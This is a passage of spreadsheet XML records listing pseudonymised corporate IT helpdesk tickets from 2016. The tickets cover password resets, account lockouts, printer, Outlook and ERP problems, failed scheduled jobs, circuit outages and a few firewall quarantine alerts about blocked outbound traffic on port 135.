    <s v="from: nwfodmhc exurcwkm _x000d__x000a_sent: wednesday, august 31, 2016 2:28 am_x000d__x000a_to: naruedlk mpvhakdq_x000d__x000a_cc: jywvemun qngschtz; weszfyok fbadnjhu_x000d__x000a_subject: re: wg: br reporting - juni und juli-zahlen fÃ¼r zeitkonten und urlaubsstÃ¤nde fehlen_x000d__x000a__x000d__x000a_hi simfghon,_x000d__x000a__x000d__x000a_kindly note that there are multiple folders under \\eagcldaten\teams\br reporting\_x000d__x000a__x000d__x000a_please mention which specific folder access has to be given._x000d__x000a__x000d__x000a_"/>
    <s v="naruedlk mpvhakdq"/>
    <x v="33"/>
  </r>
  <r>
    <s v="password reset for xhaomnjl ctusaqpr"/>
    <s v="password reset for xhaomnjl ctusaqpr"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset request "/>
    <s v="password reset request "/>
    <s v="oqvwgnkc gkjylpzx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_855685"/>
    <s v="ticket update on inplant_855685"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can't add a note to an account on the mobile"/>
    <s v="can't add a note to an account on the mobile.  i wanted to be able to demonstrate this in a meeting tomorrow but this error is blocking the ability to add a note."/>
    <s v="acteiqdu bferalus"/>
    <x v="39"/>
  </r>
  <r>
    <s v="stock transfer pricing error - intercompnay inwarehouse_tool did not reverse"/>
    <s v="they reversed the intercompany shipment but the intercompany inwarehouse_tool did not reverse. i ran the billing document tables and do not see the reversal there either._x000d__x000a_(see attached email)"/>
    <s v="fybwjzhx ojgrpafb"/>
    <x v="9"/>
  </r>
  <r>
    <s v="unable to print from dv28"/>
    <s v="unable to print from dv28"/>
    <s v="gvdkupew waphsuen"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account unlock"/>
    <s v="account unlock"/>
    <s v="hwcisuvt omepbihv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can you tell me the phone number for office 44 at the usx tower?"/>
    <s v="_x000a__x000a_received from: azxhejvq.fyemlavd@gmail.com_x000a__x000a_mikhghytr wafglhdrhjop_x000a_sr. manager, global ethics and compliance programdntys_x000a__x000a__x000a__x000a_"/>
    <s v="azxhejvq fyemlavd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="login script pop up query"/>
    <s v="login script pop up query"/>
    <s v="epqyourg rxjipfum"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_855239"/>
    <s v="ticket update on inplant_855239"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1359 failed in job_scheduler at: 08/30/2016 15:01:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1359 failed in job_scheduler at: 08/30/2016 15:01:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="install project 2013 for petrhyr"/>
    <s v="install project 2013 for petrhyr"/>
    <s v="aexbclqv zvapcslb"/>
    <x v="2"/>
  </r>
  <r>
    <s v="vip2: printer setup"/>
    <s v="vip2: printer setup"/>
    <s v="usqrpicf dfmxaliz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account locked "/>
    <s v="erp SID_34 account locked "/>
    <s v="ozfjeqml xiujacyn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not connected to server &amp; having queries on connecting to external monitors"/>
    <s v="outlook not connected to server &amp; having queries on connecting to external monitors"/>
    <s v="urgqkinl zpcokgbj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printer new driver update needed"/>
    <s v="name:kaguhxwo uoyipxqg_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:kaguhxwo.uoyipxqg@gmail.com_x000a_customer number:_x000a_telephone:172_x000a_summary:printer new driver update needed"/>
    <s v="kaguhxwo uoyipxqg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering tool locked out "/>
    <s v="_x000a__x000a_received from: nabjpdhy.bjuqwidt@gmail.com_x000a__x000a_hello_x000a__x000a_i changed my passwords and i tried to log onto engineering tool and it says too many failed attempted. see attached screenshot._x000a__x000a_stefyty hunt_x000a_prototype tech, product engineering_x000a__x000a_nabjpdhy.bjuqwidt@gmail.com&lt;mailto:nabjpdhy.bjuqwidt@gmail.com&gt;_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="pzkxsnmv aoybmnzw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset to annette"/>
    <s v="ic_x000d__x000a_ welcome, our next available agent will be with you shortly..._x000d__x000a_ interaction alerting agent._x000d__x000a_ website visitor has joined the conversation_x000d__x000a_rakthyesh ramdntythanjesh_x000d__x000a_ hi robhyertyj_x000d__x000a_ "/>
    <s v="xkisaybg fykpoxhu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows asks to install driver and then won't allow me to print"/>
    <s v="please complete all required questions below.  _x000d__x000a_if not, it will be returned back to the gsc / requester to provide required information_x000d__x000a__x000d__x000a_ â€¢  gsc to review ticket, if not able to resolve then please assign to appropriate group per your printer problem assignment flowchart._x000d__x000a__x000d__x000a_   â€¢  printer name / make - model?  (all printers - even local) _x000d__x000a_ _x000d__x000a_   â€¢  detailed description of the problem ?  windows needs to download and install a software driver from the ??HostName_769 computer to print to cl05.  (same message for all printers)_x000d__x000a__x000d__x000a_   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) _x000d__x000a_      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)  all documents will not print from any source_x000d__x000a__x000d__x000a_   â€¢  what system or application being used at time of the problem?     outlook, excel, erp - all of them_x000d__x000a_   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed?  shutdown computer and printer.  same error message._x000d__x000a__x000d__x000a_   â€¢  if erp system, which system?   (ex SID_34 / SID_38 / hrp / plm) - all _x000d__x000a__x000d__x000a_      â€¢  if it's an erp printer problem can the erp output be rerouted to another erp printer temporarily?_x000d__x000a_         what printer can it be rerouted too? _x000d__x000a__x000d__x000a_   â€¢  if document is not printing correctly, please scan copy of the document and attach to the ticketing_tool ticket."/>
    <s v="rxqtvanc kthqwxvb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="office 365 activation on corporate phone"/>
    <s v="office 365 activation on corporate phone"/>
    <s v="elphfvdt ileozacs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request to reset microsoft online services password for pvtiqgsh.orlzgfsx@gmail.com"/>
    <s v="request to reset microsoft online services password for pvtiqgsh.orlzgfsx@gmail.com"/>
    <s v="pvtiqgsh orlzgfsx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="delete print jobs on prtqc4604"/>
    <s v="delete print jobs on prtqc4604"/>
    <s v="ariovxlm gesyftvm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i changed my password and now cant sign into skype"/>
    <s v="name:mikhghytr _x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:vcyktjxp.uxdojvrq@gmail.com_x000a_customer number:_x000a_telephone:971_x000a_summary:i changed my password and now cant sign into skype"/>
    <s v="vcyktjxp uxdojvrq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="eror message on refreshing the bex analysis. error atached."/>
    <s v="eror message on refreshing the bex analysis. error atached._x000a__x000a_phone: 724"/>
    <s v="dslamtcb ezbmonjr"/>
    <x v="8"/>
  </r>
  <r>
    <s v="hr_tool queries for former employee : hanghdyle"/>
    <s v="hr_tool queries for former employee : hanghdyle"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="re: ticket_no1538811::company center authorization"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zdnqowag.cdtyonhw@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_this is approved._x000d__x000a__x000d__x000a_"/>
    <s v="zdnqowag cdtyonhw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update for inplant_855685"/>
    <s v="ticket update for inplant_855685"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request for temporary access to f.80 mass reversal"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rhwsmefo.tvphyura@gmail.com_x000d__x000a__x000d__x000a_hello.  i need to request 1 week temporary access to f.80 in erp SID_34 to correct duplicate payments in erp. "/>
    <s v="rhwsmefo tvphyura"/>
    <x v="19"/>
  </r>
  <r>
    <s v="problem with erp not updating orders after getting picked through warehouse_tool"/>
    <s v="problem with erp not updating orders after getting picked through warehouse_tool"/>
    <s v="fyzceglp vfnraqxc"/>
    <x v="17"/>
  </r>
  <r>
    <s v="ticket update for inplant_855671"/>
    <s v="ticket update for inplant_855671"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not launching"/>
    <s v="outlook not launching._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-reconfigured the mscrm._x000d__x000a_-caller confirmed that he is now able to see the emails on outlook._x000d__x000a_-issue resolved."/>
    <s v="khaibsvt lkvfxzpj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update regarding ticket_no1543461 from tqvpohwj tbkywpqz"/>
    <s v="ticket update regarding ticket_no1543461 from tqvpohwj tbkywpqz"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need to map/add network printer"/>
    <s v="need to map/add network printer"/>
    <s v="bihypqsn kbaegpcd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="jerghjemiah brock, your windows password is expiring soon!!i need assistance resetting my password. "/>
    <s v="jerghjemiah brock, your windows password is expiring soon!!i need assistance resetting my password. "/>
    <s v="mgcivbtx bshmfxya"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to send email to hrscc team from external email address "/>
    <s v="unable to send email to hrscc team from external email address "/>
    <s v="imzctxhr odmawbij"/>
    <x v="26"/>
  </r>
  <r>
    <s v="all permissions for discounts has been removed for znq,zno,znr, zns need to be restored for the whole mti team"/>
    <s v="all permissions for discounts has been removed for znq,zno,znr, zns need to be restored for the whole mti team"/>
    <s v="uajiymhe qyrwfkvz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch erp. logon balancing error"/>
    <s v="unable to launch erp. logon balancing error"/>
    <s v="zehrwlbt sdyltvnp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0434826"/>
    <s v="ticket update on ticket_no0434826"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please identify source user involved in processing deletion of terminated user"/>
    <s v="from: ugyothfz ugrmkdhx _x000a_sent: tuesday, august 30, 2016 8:21 pm_x000a_to: zkevitua nesbfirjeerabhadrappa &lt;zkevitua.nesbfirj@gmail.com&gt;_x000a_cc: hnynhsth jsuyhwssad &lt;bxspwfyo.vzystwor@gmail.com&gt;_x000a_subject: rjtnlocs fclswxkz (tanrgty)_x000a__x000a_hello aghynil,_x000a__x000a_request your assistance in identifying the source user who processed the deletion of the terminated user (in subject). let me know if you need a sn ticket to be created. "/>
    <s v="ugyothfz ugrmkdhx"/>
    <x v="38"/>
  </r>
  <r>
    <s v="HostName_1007:  volume consumed on c:\ disk is more than 85%."/>
    <s v="HostName_1007:  volume consumed on c:\ disk is more than 85%."/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="email delegation "/>
    <s v="email delegation "/>
    <s v="wbtrvdsi gdbuvszx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="rqxmaindept ad account keeps getting locked.  please unlock."/>
    <s v="rqxmaindept ad account keeps getting locked.  please unlock."/>
    <s v="kuiglfqa rwutnibm"/>
    <x v="11"/>
  </r>
  <r>
    <s v="skype login issue "/>
    <s v=":440-_x000a_summary:unable to log into skype after password change yesterday."/>
    <s v="ufpkvlyn bozthrie"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to vpn"/>
    <s v="unable to connect to vpn"/>
    <s v="dskcobqa tujrvsbc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook issue "/>
    <s v="outlook issue "/>
    <s v="nwzhlktu plktredg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="konto scghhnell reaktivieren- laptop ewel7212519"/>
    <s v="konto scghhnell reaktivieren- laptop ewel7212519"/>
    <s v="ughzilfm cfibdamq"/>
    <x v="24"/>
  </r>
  <r>
    <s v="collaboration_platform emails"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fgsmwvcp.uoxkzwes@gmail.com_x000d__x000a__x000d__x000a_it:_x000d__x000a_mhtyike szumyhtulas is receiving the attached emails._x000d__x000a_these employees do not report to him. please advise why he is receiving these?_x000d__x000a_"/>
    <s v="fgsmwvcp uoxkzwes"/>
    <x v="15"/>
  </r>
  <r>
    <s v="need to configure printer"/>
    <s v="need to configure printer"/>
    <s v="lduqxywt wcydjgvl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset."/>
    <s v="erp SID_34 password reset."/>
    <s v="giumxwvh lfvwjtin"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset."/>
    <s v="erp SID_34 password reset."/>
    <s v="qtgefsdk bytvlnca"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wifi guest account"/>
    <s v="wifi guest account"/>
    <s v="xpugzdvk xiawvmfp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to boot laptop"/>
    <s v="unable to boot laptop"/>
    <s v="wbtrvdsi gdbuvszx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset done. confirmed with user."/>
    <s v="erp SID_34 password reset done. confirmed with user."/>
    <s v="uajiymhe qyrwfkvz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1953b failed in job_scheduler at: 08/30/2016 10:18:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1953b failed in job_scheduler at: 08/30/2016 10:18:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="need to setup exchange on corporate iphone"/>
    <s v="need to setup exchange on corporate iphone"/>
    <s v="qifzkoej etbmgjvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset done. confirmed with user."/>
    <s v="erp SID_34 password reset done. confirmed with user."/>
    <s v="nsgeatyf qbyfiajo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inc1544821 - ticket update"/>
    <s v="inc1544821 - ticket update"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch engineering_tool"/>
    <s v="unable to launch engineering_tool"/>
    <s v="awcgpyeh hlavbsjf"/>
    <x v="2"/>
  </r>
  <r>
    <s v="ç­”å¤: ticket_no1538811::company center authorization"/>
    <s v="_x000a__x000a_received from: udzkgbwl.bgpedtqc@gmail.com_x000a__x000a_hello rubiargty_x000a__x000a_need access same as karghyuen._x000a__x000a__x000a_best "/>
    <s v="udzkgbwl bgpedtqc"/>
    <x v="21"/>
  </r>
  <r>
    <s v="problemas de configuraÃ§Ã£o no quick quote"/>
    <s v="as imagens nÃ£o alteramdnty quando solicitadas dificultando assim a cotaÃ§Ã£o de ferramdntyentas especiais."/>
    <s v="zpfitlyu cemvwyso"/>
    <x v="62"/>
  </r>
  <r>
    <s v="mapping network "/>
    <s v="mapping network "/>
    <s v="hjxdkwtr jzeuyfdp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="palghjmal1 is not able to run softland client through citrix"/>
    <s v="qohfjpna exphkims (palghjmal1) is not able to run softland client through citrix. it shows an error when loading the application._x000d__x000a_please see attached error. i have uacyltoe hxgayczeed from other pc's and got same problem."/>
    <s v="qohfjpna exphkims"/>
    <x v="11"/>
  </r>
  <r>
    <s v="install shop_floor_app on my machine"/>
    <s v="install shop_floor_app on my machine"/>
    <s v="zqrnveyx hajtfmcd"/>
    <x v="2"/>
  </r>
  <r>
    <s v="outlook cache email query."/>
    <s v="outlook cache email query."/>
    <s v="qicmfaoe hdrysife"/>
    <x v="0"/>
  </r>
  <r>
    <s v="new cpp id can not request initiative.  see image attached"/>
    <s v="cphlme01_x000d__x000a_"/>
    <s v="pfzxecbo ptygkvzl"/>
    <x v="21"/>
  </r>
  <r>
    <s v="re: ticket_no1538811::company center authorization"/>
    <s v="_x000a__x000a_received from: rubiargty.fatgrtyma@company.com_x000a__x000a_hello cathytyma,_x000a__x000a_update the position title as per request. regarding access please provide copy access person's name._x000a__x000a__x000a_"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ç­”å¤: ticket_no1538811::company center authorization"/>
    <s v="_x000d__x000a__x000d__x000a_received from: udzkgbwl.bgpedtqc@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_i'm still waiting for problem resolve. please advise who's approval you still need, or when i can have access._x000d__x000a__x000d__x000a_"/>
    <s v="udzkgbwl bgpedtqc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="whenever i open an email with a jpg attachement i always get a security warning&gt; "/>
    <s v="whenever i open an email with a jpg attachement i always get a security warning&gt; "/>
    <s v="hitakmbs fvhmkntq"/>
    <x v="2"/>
  </r>
  <r>
    <s v="all of the presentations posted for drive this week are not appearing on the approval page.  "/>
    <s v="all of the presentations posted for drive this week are not appearing on the approval page.  tomashtgd mchectg likes to use the approval page to navigate around the presentations, so i'm sure he will notice it is not working correctly._x000d__x000a__x000d__x000a_see attached file for details and urls."/>
    <s v="erckhtzj tdmkgoie"/>
    <x v="15"/>
  </r>
  <r>
    <s v="i can not print.  it is asking me to install a print driver"/>
    <s v="i can not print.  it is asking me to install a print driver_x000d__x000a__x000d__x000a_i can not print.  it is asking me to install a print driver_x000d__x000a_i did with nothing happened"/>
    <s v="vsbtygin oufhtbas"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for cpmaidhj elbaqmtp using password_management_tool password reset."/>
    <s v="the"/>
    <s v="cpmaidhj elbaqmtp"/>
    <x v="16"/>
  </r>
  <r>
    <s v="erp salary statement"/>
    <s v="my lauacyltoe hxgaycze salary statement was on 6/30/2016.  i am continuing to get paychecks, just unable to see salary statement in erp.  have been going through the hub._x000d__x000a__x000d__x000a_"/>
    <s v="ovpuqfaj pqruovit"/>
    <x v="51"/>
  </r>
  <r>
    <s v="s&amp;op"/>
    <s v="_x000a__x000a_received from: uyrpdvoq.mbzevtcx@gmail.com_x000a__x000a_could you please reset my password_x000a__x000a__x000a__x000a_uyrpdvoq mbzevtcx_x000a_sales manager earthworks european served area â€“ north_x000a__x000a_uyrpdvoq.mbzevtcx@gmail.com&lt;mailto:uyrpdvoq.mbzevtcx@gmail.com&gt;_x000a__x000a__x000a_company infrastructure gmbh_x000a_geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx und naruedlk mpvhakdq_x000a__x000a_www.company.com&lt;_x000a__x000a__x000a_"/>
    <s v="uyrpdvoq mbzevtcx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ess access for user ghaltiek lsuepvyx (yesilc)"/>
    <s v="ess access for user ghaltiek lsuepvyx. please find error message attached._x000a__x000a_phone: 0157"/>
    <s v="wcupoaty fqnzwphj"/>
    <x v="19"/>
  </r>
  <r>
    <s v="'repeat outbound connection for 135/tcp"/>
    <s v="user id dalgtylam place in quarantine_x000d__x000a__x000d__x000a_we are seeing your 80.71.06.702/company-european-asa.company.com-1 device generating a high volume of 'repeat outbound connection for 135/tcp' alerts for traffic (blocked) from edml8111119/10.16.143.33 to port 135/tcp (remote procedure call (rpc)) of external host 31.199.53.10. this may indicate a misconfiguration, where the firewall is blocking traffic to a legitimate server/application. this may also indicate a compromised host reaching out to a malicious host or propagating worm code.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1) full escalation for windows login failure alerts (explicit notification via a high priority ticket and a phone call) 2) automatically resolve windows login failure alerts directly to the portal (no explicit notification but events will be available for reporting purposes in the portal)"/>
    <s v="afkstcev utbnkyop"/>
    <x v="69"/>
  </r>
  <r>
    <s v="printer driver update"/>
    <s v="printer driver update"/>
    <s v="dqplrwoy cutpwjie"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp training queries "/>
    <s v="erp training queries "/>
    <s v="lqophnis rcmepgvq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problem with office365.com"/>
    <s v="_x000a__x000a_received from: zywoxerf.paqxtrfk@gmail.com_x000a__x000a_dear help desk:_x000a_my office365 always gives me a blank page, see below for a screen shot. please help._x000a__x000a_[cid:image001.png@01d20292.c6465901]_x000a__x000a_x.  jdamieul  fandyhgg_x000a__x000a_phd, us_x000a_senior staff engineer_x000a_zywoxerf.paqxtrfk@gmail.com&lt;mailto:zywoxerf.paqxtrfk@gmail.com&gt;_x000a_"/>
    <s v="zywoxerf paqxtrfk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="repeat outbound connection for 135/tcp"/>
    <s v="user zhengdr placed in palo_virus_quarantine_x000d__x000a__x000d__x000a_incident overview_x000d__x000a_=========================_x000d__x000a_we are seeing your 54.96.80.216/att-apac-asa.company.com-1 device generating a high volume of 'repeat outbound connection for 135/tcp' alerts for traffic (blocked) from aenl8811417/12.41.82.81268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
    <s v="afkstcev utbnkyop"/>
    <x v="30"/>
  </r>
  <r>
    <s v="printer configuration "/>
    <s v="printer configuration "/>
    <s v="kzjtvbaf nskfwlvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset."/>
    <s v="erp SID_34 password reset done. confirmed with user."/>
    <s v="cpsybwla snymigat"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1314 failed in job_scheduler at: 08/30/2016 08:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1314 failed in job_scheduler at: 08/30/2016 08:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="logon error in erp SID_1"/>
    <s v="logon error in erp SID_1"/>
    <s v="yvzegwph xgzwiqta"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage:usa, nv - divestiture site :secondary vpn circuit is down since at 8:04 am et on 08/30.primary is up "/>
    <s v="what type of outage:  _____network     _x____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______8:04 am et on 08/30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job SID_11_uacyltoe hxgaycze failed in job_scheduler at: 08/30/2016 07:52:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_11_uacyltoe hxgaycze failed in job_scheduler at: 08/30/2016 07:52:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="sn access"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rdfjsawg.zpmxgdcw@gmail.com_x000d__x000a__x000d__x000a_please add user vvkatts to ticketing_tool erp finance group._x000d__x000a__x000d__x000a_let me know if you have any questions._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="rdfjsawg zpmxgdcw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not loading "/>
    <s v="outlook not loading "/>
    <s v="cighytol yjurztgd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can't access expense reporting through employee self service"/>
    <s v="when trying to enter the expense reporting tab to create a new expense report, a window pops up and says critical runtime error and i can't access the expense reporting page. other aspects of my expense reporting page in employee self service don't work as well. "/>
    <s v="kvtchbus tqrehbsd"/>
    <x v="19"/>
  </r>
  <r>
    <s v="windows printing issues / need driver installed on every printer but it does not complete successfully."/>
    <s v="windows printing issues / need driver installed on every printer but it does not complete successfully._x000d__x000a_print server HostName_769."/>
    <s v="shloyakw jztsxdln"/>
    <x v="11"/>
  </r>
  <r>
    <s v=" HostName_145: volume comsumed on  /dev/hd3 is more than 85%."/>
    <s v=" HostName_145: volume comsumed on  /dev/hd3 is more than 85%."/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="46"/>
  </r>
  <r>
    <s v="erp SID_34 password reset."/>
    <s v="erp SID_34 password reset."/>
    <s v="gvktqfrj uawjnfel"/>
    <x v="0"/>
  </r>
  <r>
    <s v="emails are not working"/>
    <s v="emails are not working"/>
    <s v="pofkwlui joteryma"/>
    <x v="0"/>
  </r>
  <r>
    <s v="impact award password reset."/>
    <s v="impact award password reset."/>
    <s v="lvqzcdxj gdfivbqc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset request."/>
    <s v="password reset request."/>
    <s v="htburown hpkfjqyr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset through password_management_tool password manager"/>
    <s v="password reset through password_management_tool password manager"/>
    <s v="neoarmgd meodvbxu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ad account lock out "/>
    <s v="ad account lock out "/>
    <s v="neoarmgd meodvbxu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked out in ad"/>
    <s v="account locked out in ad"/>
    <s v="akisjtzm uvbmysgc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="telephony_software 2016 r2 - please can you reset &amp; release my password ?"/>
    <s v="_x000d__x000a__x000d__x000a_received from: hupnceij.hyozjakb@gmail.com_x000d__x000a__x000d__x000a_hello all,_x000d__x000a_how are you?_x000d__x000a__x000d__x000a_telephony_software 2016 r2 - please can you reset &amp; release my password ?_x000d__x000a__x000d__x000a_sincÃ¨res salutations, best "/>
    <s v="hupnceij hyozjakb"/>
    <x v="6"/>
  </r>
  <r>
    <s v="microsoft outlook not work - user bhqvklgc vscdzjhg"/>
    <s v="after change the password using password_management_tool, outlook not work._x000a_we've deleted the profiles and reconfigured outlook again, but is asking the password continuously._x000a_user: bhqvklgc vscdzjhg _x000a_e-mail: bhqvklgc.vscdzjhg@gmail.com_x000a_user id: marrthyu_x000a_computer name: ekbl8111197_x000a_"/>
    <s v="bxeagsmt zrwdgsco"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ad account locked out "/>
    <s v="ad account locked out "/>
    <s v="piewoyqx bivcmwlh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook fails to open."/>
    <s v="outlook fails to open."/>
    <s v="aeophctw nvjyhizu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage : company-eu-gbr-united kingdom-dmvpn-1921-rtr01.lookup located at united kingdom is down."/>
    <s v="circuit outage : company-eu-gbr-united kingdom-dmvpn-1921-rtr01.lookup located at united kingdom went down at 05:13 am et on 08/30."/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="7"/>
  </r>
  <r>
    <s v="HostName_1010: erpstartsrv.exe service is down."/>
    <s v="HostName_1010: erpstartsrv.exe service is down."/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="13"/>
  </r>
  <r>
    <s v="erp SID_37 password reset and unlock account request "/>
    <s v="erp SID_37 password reset and unlock account request "/>
    <s v="vrjwyqtf qoxkapfw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="new password for erp SID_37 (bex) needed"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ptyxefvk.fhazbrwn@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_could you please provide me a new password for bex?_x000d__x000a__x000d__x000a_"/>
    <s v="ptyxefvk fhazbrwn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password expires"/>
    <s v="_x000d__x000a__x000d__x000a_received from: loqdtrfn.apxmsjkc@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_during my holidays my password expires and i couldn't change this._x000d__x000a_"/>
    <s v="loqdtrfn apxmsjkc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job HostName_1019fail_vig_uacyltoe hxgaycze failed in job_scheduler at: 08/30/2016 05:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019fail_vig_uacyltoe hxgaycze failed in job_scheduler at: 08/30/2016 05:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp printers ng20 and ng 43 are printing on both sides (erp documents). needs to be changed to single side printing."/>
    <s v="erp printers ng20 and ng 43 are printing on both sides (erp documents). needs to be changed to single side printing._x000d__x000a_users: _x000d__x000a_mxwibrtg qbsmonwv_x000d__x000a_cwfzldts dlmukhyn_x000d__x000a_uxpytsdk kyamilds_x000d__x000a__x000d__x000a_"/>
    <s v="jcdewsuv mdipqhzx"/>
    <x v="18"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock."/>
    <s v="erp SID_34 account unlock."/>
    <s v="kdeohucw qhxbcfes"/>
    <x v="0"/>
  </r>
  <r>
    <s v="setup new ws \strahlraum \xaqzisrk ahbgjrqz"/>
    <s v="setup new ws \strahlraum \xaqzisrk ahbgjrqz"/>
    <s v="xaqzisrk ahbgjrqz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \strahlraum \ujtmipzv cwdzunxs"/>
    <s v="setup new ws \strahlraum \ujtmipzv cwdzunxs"/>
    <s v="ujtmipzv cwdzunxs"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \strahlraum \fyedqgzt jdqvuhlr"/>
    <s v="setup new ws \strahlraum \fyedqgzt jdqvuhlr"/>
    <s v="xpmgtlcq ksaefihz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="vfx3, 4 interco inwarehouse_tools cannot be processed"/>
